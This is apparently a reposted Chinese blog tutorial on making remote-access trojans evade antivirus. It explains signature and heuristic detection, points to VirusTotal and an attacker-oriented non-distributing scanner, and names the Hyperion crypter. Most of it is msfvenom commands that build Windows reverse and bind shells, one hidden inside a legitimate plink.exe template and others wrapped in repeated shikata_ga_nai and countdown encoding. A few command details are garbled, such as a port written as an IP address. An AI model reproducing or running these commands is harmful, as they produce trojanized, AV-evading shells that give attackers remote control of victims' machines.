RAT免杀技术
编程语言
2020-02-11 13:02:31
阅读次数: 0
RAT
RAT思维导图下载链接
检测原理
基于二进制文件中特征签名的黑名单检测方法
基于行为的分析方法(启发式)
免杀技术
修改二进制文件中的特征字符
加密技术(crypter)
- 通过加密使得特征字符不可读,从而逃避AV检测
- 运行时分片分段的解密执行,注入进程或AV不检查的无害文件中
防病毒软件的检测
- 恶意程序本身的特征字符
- 加密器crypter的特征字符
在线多引擎查杀网站与AV厂商共享信息
https://www.virustotal.com/gui/home/upload
http://www.virscan.org/
搞黑的在线多引擎查毒站
https://nodistribute.com/
软件保护
软件开发商为保护版权,采用的混淆和加密技术避免盗版逆向
常被恶意程序软件用于免杀目的
Hyperion(32bit程序加密器)
- Crypter(加密)
- Container(解密器+PE Loader)
利用模板(正常程序)隐藏shell
#msfvenom -p(加载) windows/shell_reverse_tcp -x(使用模板) /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4.4.4.4 -a(操作系统架构) x86 --platform(平台) win(windows) -f(输出格式) exe -o(输出) a.exe
#msfvenom -p(加载) windows/shell/bind_tcp -x (模板) /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -e x86/shaikata_ga_nai -i 5 -a x86 --platform win -f exe > b.exe
#strins a.exe(查看可疑程序可读字符串内容)
#md5sum *.exe(查看程序的值)
加密编码反弹shell
#msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -f(格式) raw(原始格式) -e(加密) x86/shikata_ga_nai(加密模块) -i(加密次数) 5(五次)
| (管道)msfvenom -a(架构) x86 --platform(平台 ) windows -e(加密) x86/countdown(模块) -i(加密次数) 8(次数) -f(输出格式) raw(原始格式)
|(管道) msfvenom -a(架构) x86 --platform(平台) windows -e(加密) x86/shikata_ga_nai(模块) -i(加密次数) 9 -b(过滤特殊字符) ‘\x00’ -f(输出格式) exe -o(输出) a.exe
生成反弹shell
#msfvenom -p(payload) windows/shell/bind_tcp lhost(对方ip)=1.1.1.1 lport(对方端口)=4444 -a(操作系统架构) x86 --platform(平台) win(windows平台) -f (输出格式)exe -o(输出) a.exe
发布了20 篇原创文章 ·
获赞 1 ·
访问量 222
转载自blog.csdn.net/weixin_43555997/article/details/104255655
